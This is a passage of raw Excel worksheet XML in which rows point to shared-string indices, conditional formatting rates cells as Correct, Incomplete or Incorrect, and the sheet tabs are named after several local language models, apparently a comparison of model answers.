        <v>15</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>95</v>
      </c>
      <c r="G10" s="3"/>
    </row>
    <row r="11" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>96</v>
      </c>
      <c r="G11" s="3"/>
    </row>
    <row r="12" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D12" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>97</v>
      </c>
      <c r="G12" s="3"/>
    </row>
    <row r="13" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>98</v>
      </c>
      <c r="G13" s="3"/>
    </row>
    <row r="14" spans="1:7" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>99</v>
      </c>
      <c r="G14" s="3"/>
    </row>
    <row r="15" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>100</v>
      </c>
      <c r="G15" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C15">
    <cfRule type="cellIs" dxfId="32" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="31" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="30" priority="3" operator="equal">
      <formula>"Incorrect"</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331.2" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>102</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="345.6" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>103</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>104</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="288" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>105</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="273.60000000000002" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>106</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="230.4" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>107</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>108</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="29" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="28" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="27" priority="3" operator="equal">
      <formula>"Incorrect"</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86.4" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>110</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>111</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>112</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>113</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>114</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="230.4" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>115</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="26" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="25" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="24" priority="3" operator="equal">
      <formula>"Incorrect"</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17</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="17" baseType="lpstr">
      <vt:lpstr>Dashboard</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>deepseek-r1</vt:lpstr>
      <vt:lpstr>gemma3</vt:lpstr>
      <vt:lpstr>gemma3n</vt:lpstr>
      <vt:lpstr>granite3-dense</vt:lpstr>
      <vt:lpstr>granite3.2</vt:lpstr>
      <vt:lpstr>lily_cyber</vt:lpstr>
      <vt:lpstr>llama3</vt:lpstr>
      <vt:lpstr>llama3.2</vt:lpstr>
      <vt:lpstr>mistral</vt:lpstr>
      <vt:lpstr>nomic-embed-text</vt:lpstr>
      <vt:lpstr>phi3</vt:lpstr>
      <vt:lpstr>phi4-mini</vt:lpstr>
      <vt:lpstr>phi4-mini-reasoning</vt:lpstr>
      <vt:lpstr>qwen2.5</vt:lpstr>
      <vt:lpstr>qwen3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Paulo Ribeiro</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-15T21:19:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-16T15:05:48Z</dcterms:modified>
</cp:coreProperties>
</file>